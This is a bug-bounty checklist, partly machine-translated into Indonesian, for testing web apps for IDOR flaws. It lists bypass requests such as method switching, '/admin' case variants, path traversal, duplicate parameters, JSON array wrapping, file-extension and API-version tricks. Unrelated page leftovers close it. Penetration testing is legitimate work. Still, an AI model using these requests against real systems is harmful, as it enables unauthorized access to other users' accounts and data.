Daftar Periksa IDOR
May 03 2023
Langkah Dasar: [ ] informasi akun [ ] LIHAT & HAPUS & Buat api_key [ ] memungkinkan untuk membaca komentar apa pun [ ] ubah harga [ ] ubah koin dari dolar menjadi eur [ ] Coba dekode ID, jika ID dikodekan menggunakan md5,base64 , dll logika bisnis, daftarkan kerentanan, lewati 2fa, autentikasi Semua daftar periksa di repo ini https://github.com/Az0x7/vulnerability-Checklist mengikuti saya.
Langkah Dasar:
1. Create two accounts if possible or else enumerate users first.
2. Check if the endpoint is private or public and does it contains any kind of id param.
3. Try changing the param value to some other user and see if does anything to their account.
4. Done !!
try if you can idor to view image of any profille
[ ] informasi akun
[ ] LIHAT & HAPUS & Buat api_key
[ ] memungkinkan untuk membaca komentar apapun
[ ] mengubah harga
[ ] ubah koin dari dolar menjadi eur
[ ] Coba decode ID, jika ID dikodekan menggunakan md5,base64,dll
GET /GetUser/dmljdGltQG1haWwuY29t
[...]
GET /users/delete/victim_id ->403
POST /users/delete/victim_id ->200
Instead of this:
GET /api/albums?album_id=<album id>
Try This:
GET /api/albums?account_id=<account id>
Tip: There is a Burp extension called Paramalyzer which will help with this by remembering all the parameters you have passed to a host.
POST /users/delete/victim_id ->403
POST /users/delete/my_id/..victim_id ->200
Content-Type: application/xml ->
Content-Type: application/json
GET /file?id=90djbkdbkdbd29dd
GET /file?id=302
GET /admin/profile ->401
GET /Admin/profile ->200
GET /ADMIN/profile ->200
GET /aDmin/profile ->200
GET /adMin/profile ->200
GET /admIn/profile ->200
GET /admiN/profile ->200
GET /api/users/user_id ->
GET /api/users/*
for hashed ID ,create multiple accounts and understand the ppattern application users to allot an iD
search all the endpoints having ID which the search engine may have already indexed
use tools like arjun , paramminer
GET /api_v1/messages ->200
GET /api_v1/messages?user_id=victim_uuid ->200
GET /api_v1/messages?user_id=attacker_id&user_id=victim_id
GET /api_v1/messages?user_id=victim_id&user_id=attacker_id
GET /user_data/2341 -> 401
GET /user_data/2341.json -> 200
GET /user_data/2341.xml -> 200
GET /user_data/2341.config -> 200
GET /user_data/2341.txt -> 200
{"userid":1234,"userid":2542}
{"userid":123} ->401
{"userid":[123]} ->200
{"userid":123} ->401
{"userid":{"userid":123}} ->200
GET /v3/users_data/1234 ->401
GET /v1/users_data/1234 ->200
GET /graphql
[...]
GET /graphql.php?query=
[...]
logika bisnis , daftarkan kerentanan , lewati 2fa , autentikasi
Semua daftar periksa di repo ini
https://github.com/Az0x7/vulnerability-Checklist
mengikutiku
- linkedin , Twitter
![Apa itu Linked List? [Bagian 1]](https://post.nghiatu.com/assets/images/m/max/724/1*Xokk6XOjWyIGCBujkJsCzQ.jpeg)
Jana Duggar: Semua yang Dia Katakan Tentang Cinta dan Jendela 5 Tahunnya untuk Menemukan 'Yang Satu'
